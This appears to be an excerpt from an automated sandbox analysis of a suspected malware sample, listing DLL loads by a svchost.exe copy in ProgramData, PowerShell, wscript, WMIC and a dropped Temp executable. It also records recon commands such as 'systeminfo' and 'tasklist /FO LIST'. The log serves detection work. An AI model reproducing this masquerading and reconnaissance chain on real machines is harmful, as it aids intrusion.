                                  Source: C:\ProgramData\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: pcacli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                  Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
